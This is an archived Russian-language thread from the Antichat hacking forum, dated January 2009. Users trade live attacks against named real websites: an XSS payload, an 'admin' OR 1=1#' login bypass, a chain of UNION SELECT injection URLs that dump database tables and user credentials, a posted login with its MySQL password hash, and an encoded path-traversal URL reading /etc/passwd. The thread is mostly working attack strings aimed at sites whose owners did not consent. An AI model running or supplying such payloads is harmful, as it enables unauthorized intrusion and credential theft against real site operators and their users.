ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
22.01.2009, 12:24
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040
Репутация:
15
|
|
Парни,а мой вопрос утонул значит!Подскажите очень надо!
|
|
|
22.01.2009, 14:31
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040
Репутация:
15
|
|
$userdata = session_pagestart($user_ip, PAGE_LOGIN);
init_userprefs($userdata);
if ($sid == '' || $sid != $userdata['session_id'])
{
message_die(GENERAL_ERROR, 'Invalid_session');
}
$session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, $autologin, $admin);
Вот куски кода могу весь выложить если нужно!!
|
|
|
|
22.01.2009, 14:36
|
|
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729
Репутация:
67
|
|
Сообщение от Qam
$userdata = session_pagestart($user_ip, PAGE_LOGIN);
init_userprefs($userdata);
if ($sid == '' || $sid != $userdata['session_id'])
{
message_die(GENERAL_ERROR, 'Invalid_session');
}
$session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, $autologin, $admin);
Вот куски кода могу весь выложить если нужно!!
по видимому тебе нужно знать IP пользователя и значение переменной $autologin для генерации сессии
|
|
|
|
22.01.2009, 16:35
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
Помогите с проблемой есть сайтик "_http://www.nb-torg.ru/"
CMS - CNStats 3.3
Нашел такие проблемки в нем:
XSS
http://www.nb-torg.ru/search/?search="><script>alert("error");</script>
и отсутствие фильтрации MySQL
http://www.nb-torg.ru/gd/-17
Что можно интересного придумать с SQL как разобрать если не сложно подскажите!
Заранее спасибо!
|
|
|
|
22.01.2009, 16:47
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Чего ты вот это морочишься... Мысли глобально... Заходи в админку:
Логин: admin' OR 1=1#
Пароль любой...
Редирект не сработает, но если пораскинуть мозгами, можно тупо потом ввести:
http://www.nb-torg.ru/admin/main.php
вуаля - ты одмин
З.Ы. Я поражен, неужели это CMS?
Последний раз редактировалось groundhog; 22.01.2009 в 16:50..
|
|
|
|
22.01.2009, 17:23
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Да, это не основная админка, но опять же - учитесь мыслить глобально... У вас уже есть доступ в админку первого уровня... Она бажная... Находим в ней инъекцию и раскручиваем:
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION _SCHEMA.TABLES+LIMIT+X,1--
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_SCHEMA,TABLE _NAME),3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+ TABLE_NAME+LIKE+'%25admin%25'+LIMIT+X,1--
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_NAME,COLUMN_ NAME),3,4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+ TABLE_NAME='cns_users'+LIMIT+X,1--
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION _SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25user%25'+ AND+TABLE_SCHEMA=DATABASE()+LIMIT+X,1--
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,ID,NAME,PASSWORD,E MAIL,ICQ),3,4,5+FROM+frb_users+LIMIT+X,1--
Последний раз редактировалось groundhog; 22.01.2009 в 17:45..
|
|
|
|
22.01.2009, 17:49
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
Остальное уже разобрал:
http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,concat(login,char(58),password),3 ,4,5+FROM+db5971c.cns_users+limit+0,1--
Единственный косяк с пассом не могу понять
login: bolt
pass: *8BB679C6BFDA0D1AAFC77A05A7A01DBFF48F10A5
|
|
|
|
22.01.2009, 17:53
|
|
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729
Репутация:
67
|
|
login: bolt
pass: *8BB679C6BFDA0D1AAFC77A05A7A01DBFF48F10A5
MySQL5
|
|
|
|
22.01.2009, 17:53
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Да... Что-то интересное...
|
|
|
|
22.01.2009, 21:19
|
|
Познающий
Регистрация: 15.11.2008
Сообщений: 32
Провел на форуме:
306778
Репутация:
22
|
|
http://37-77.ru/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
Это как использовать???
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид